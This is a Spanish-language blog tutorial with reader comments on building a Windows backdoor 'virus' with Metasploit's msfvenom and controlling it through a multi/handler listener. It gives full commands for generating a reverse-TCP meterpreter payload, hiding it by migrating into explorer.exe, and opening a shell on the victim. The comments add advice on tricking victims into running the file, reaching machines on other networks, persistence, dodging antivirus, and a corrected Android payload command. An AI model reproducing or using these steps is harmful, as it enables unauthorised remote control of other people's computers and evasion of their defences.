Hola muy buenas, hoy os traigo una guía de como crear un virus mediante Metasploit Framework, específicamente con la herramienta que nos proporciona Metasploit y es la de crear payloads, una vez creado el payload crearemos el servidor con el que interactuara el virus para poder tener acceso total a la máquina vícitma, a continuación muestro como:
Comenzamos con la creación del payload (virus), empezaremos por abrir una consola en Kali Linux y escribiendo el siguiente comando:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[nuestra IP] LPORT=[9999] -a x86 –platform windows -o /root/Desktop/virus.exe -f exe
-p: Especificamos el payload a utilizar.
-a: Arquitectura que va a utilizar el virus.
–platform: Plataforma en la que actuara el virus.
-o: Directorio donde se guardara el virus.
-f: Formato en cual se guardara el virus.
Aquí el virus creado:
Ahora procederemos a crear el servidor, el cual interactuara con el equipo o equipos infectados, abrimos una terminal y escribiremos lo siguiente:
msfconsole
Una vez ejecutado metasploit, usaremos el siguiente comando:
use multi/handler
Una vez ejecutado lo siguiente, ejecutaremos el payload server de la siguiente manera:
set PAYLOAD windows/meterpreter/reverse_tcp
Hacemos un show options:
show options
Tendremos que insertar lo anteriormente configurado, el LHOST y el LPORT, pondremos los anteriormente configurados en el virus:
set LHOST 192.168.1.116
set LPORT 9999
Una vez insertados los dos parámetros, procederemos a la explotación:
exploit -j
Una vez explotado, ejecutaremos el virus en un máquina con windows:
Una vez ejecutado, en la consola donde explotamos saldrá lo siguiente:
Lo siguiente que haremos será ver las sesiones que tenemos ejecutadas con este servidor:
sessions -i
Este comando nos dará la información de todas las sesiones que tenemos conectadas a nosotros mediante el virus creado:
Como podemos apreciar nos da la información de la víctima, ahora procederemos a habilitar la interacción con el virus para poder mantener el control total de la máquina atacada:
sessions -i 1
Esto nos conectará a la máquina atacada, una vez ejecutado haremos un ps, esto sirve para ver los procesos ejecutados de la máquina atacante:
Aquí los procesos de la máquina y entre ellos vemos el virus creado:
Ahora lo que haremos será ocultarlo a la vista, lo cual lo fusionaremos con otro proceso el cual elegiremos Explorer.exe:
Para fusionar los dos procesos, lanzaremos el siguiente comando:
migrate [id del proceso]
Objetivo completado:
Una vez realizado esto, lanzaremos el comando shell, esto nos dará la consola del equipo víctima:
shell
Ahora nos iremos a C:/
Llegaremos a C:/ y haremos un dir para ver por ejemplo que carpetas tiene:
Aquí el resultado, control total sobre la máquina infectada:
Todo el proceso y las imágenes han sido comprobadas y capturadas por mi.
Saludos, David De Maya Merras, @DavidDeMaya
Hola amigo , he visto muchos de esos tutoriales , cuando migro el virus a explores se supones qe alli deberia de ya qedar remotamente , porqe explores se inicia cuando incia sesion windows, lo cual bastaria con solo hacer la coneccion con metasploit , pero a mi no me qeda remotamente …bueno la verdad tampoco me interesa este tipo de virus pues he leido bastante qe es un virus muy para novatos ….lo mejor es aprende a programar….»existen 2 tipos de hackers , el que pograma y el fabricante» suerte compañero !
Hola brandon, habrás visto muchos tutoriales, pero tendrás primero que aprender a como dominar este tipo de virus, te explico, si no te queda el backdoor nativo, es debido a que migrar un proceso a otro sirve para ocultárselo a la víctima, para dejarlo nativo tienes que seguir otro procedimiento diferente, y si este tipo de virus o backdoor es muy inicial, pero con unas técnicas de ocultación llegan a ser muy eficientes, también es mejor crear un virus a código pero para iniciarse en el hacking esta bastante bien, y por cierto «existen dos tipos de hackers, el que programa y el hacker que utiliza el programa :)» La suerte me acompaña.
Amigo david tienes algun numero de contacto
Hola Cristian, puedes contactar por telegram @hsdavid172 o por correo en la sección de contacto. Un saludo, David.
hola, este proceso es solo para red local? o serviria para pc que estuvieran en distinta red? un saludo
Hola Papa Pitufo, sirve también para otras redes, pero para que se pudiesen conectar a ti desde otra red, tendrías que hacer una configuración diferente, por ejemplo abrir un puerto en tu router, para permitir las conexiones de las víctimas, redirigir ese puerto al la máquina atacante, y la configuración de las IP’s en el momento del ataque. Gracias por visitar mi blog.
hola tengo una duda, como se hace para copiar y ejecutar el virus.exe en la maquina con windows, se puede hacer remoto? o se debe ejecutar en la maquina y hacer la copia manual? si fuera el caso, me imagino que es aquí donde entra la parte donde se engaña al usuario para que lo ejecute por nosotros verdad ?
Exactamente mauricio ese «virus.exe» es el que debe ejecutar la víctima para que podamos realizar el backdoor. Exactamente lo puedes copiar en la máquina víctima mediante un USB o echar imaginación para que la víctima lo ejecute.
PD: Gracias por visitar el blog Mauricio. David De Maya.
muy bien explicado, ahora sobre los puertos ya lo sabia para hacerlo remoto pero para hacerlo nativo entiendo que tienes que juntarlo a cierto proceso que se ejecute inmediatamente por ejemplo svchost.exe ahora si lo junto a dicho proceso efectuaria al prender la pc ? incluso si la victima llegara a borrar el ejecutable? no se si mi pregunta es muy confusa, trate de explicarme lo mejor posible.
Hola MrKali, aquí te dejo un vídeo del canal de youtube para que puedas hacerlo persistente aunque se reinicie o se borre el .exe, Vídeo, saludos, David.
Buenas, cuando he infectado el ordenador víctima tengo los permisos del usuario que infecte, o permisos de administrador. Gracias 🙂
Hola Juan, en principio tienes los permisos del usuario que ha ejecutado el .exe, en caso de ejecutarlo como administrador, este tendrá como administrador. Un saludo, David.
tengo una duda por que cuando lo inicio en un windows me aparece «la aplicacion no se ha podido inciar correctamente (0xc0000005). Haga clic en aceptar para terminar la aplicacion.» ¿como lo soluciono?
Hola Gustavo, seguramente el .exe no lo tengas bien construido. Un saludo, David.
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Error: The following options failed to validate: LHOST, LPORT.
me sale ese error al tratar de crear el virus
Hola Selena, ¿has seguido la guía paso a paso?
quisiera crear un exploit persistente pero winrar y que al abrir suelte el viruz no se si se pueda lograr, aparte una pregunta como seria si le envió el archivo a la victima y lo habré desde otra red osea otra pc igualmente me da el acceso?
Hola buenas, en principio lo que se debe realizar cuando intentas infectar a una víctima es ofuscar el código de tu «carga» maliciosa, para que las firmas de los antivirus no la detecten e infiltrarla con otra aplicación, cuando metes un backdoor en un winrar posiblemente si puedas, pero en el momento de descompresión el antivirus lo detectará con facilidad, cuando este backdoor, te lo llevas a otra red, tienes que abrir puertos en tu router en caso de hacerlo de esa manera para una prueba de concepto o tener un servidor en algún hosting que sirva de servidor de escucha. Un saludo, David.
Para dejarlo remoto que se inicie cada vez que el equipo comprometido encienda tienes que hacerlo persistente en el mismo, eso se logra una vez que te da el meterpreter, migras al proceso que vas a migrar y en ese momento lo haces persintente
Hola amigo david oye puedes hacer un tutorial de como programar el virus en kali linux plis
Hola PaTo. Queda anotado para el siguiente post. Un saludo, David.
Hola bro tengo un problema con el primer comando para crear un payload ya que me sale el siguiente error invalid payload latform. Y no se como solucionarlo me podrias ayudar
A mi a la hora de crear el virus me dice Error: The payload could not be generated, check options.Alguien me podria ayudar ???
Hola,
¿Podrías indicar cual es el comando que estás intentando lanzar?
Un saludo,
David.
msfvenom -p android/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.100.5 LPORT=4444 –format bash -f war > runme.war
Hola,
El problema reside en que estás intentado encodear el payload de android el cual no es compatible con «shikata_ga_nai». Te dejo a continuación como sería el comando correcto:
«msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.100.5 LPORT=4444 -f war > runme.war»